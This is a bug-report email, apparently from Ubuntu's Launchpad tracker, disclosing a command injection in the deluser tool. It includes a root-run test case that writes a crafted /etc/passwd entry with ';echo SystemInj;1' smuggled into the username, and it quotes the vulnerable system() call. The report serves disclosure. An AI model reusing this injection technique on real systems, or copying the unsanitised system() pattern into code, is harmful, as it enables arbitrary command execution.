Public bug reported:
Binary package hint: adduser
/usr/sbin/deluser have command injection bug .
testcase :
root@emanuel-desktop:/tmp# echo ";echo
SystemInj;1:x:9898:9899:,,,:/home/Sysinj:/bin/bash" >> /etc/passwd
root@emanuel-desktop:/tmp# /usr/sbin/deluser ";echo SystemInj;1"
no crontab for root
SystemInj
Removing user `;echo SystemInj;1' ...
Warning: group `' has no more members.
Done.
the bug can be found at :
if (system("crontab -l $user >/dev/null 2>&1") == 0) {
** Affects: adduser (Ubuntu)
Importance: Undecided
Status: New
--
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/782170
Title:
command injection in deluser
--
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
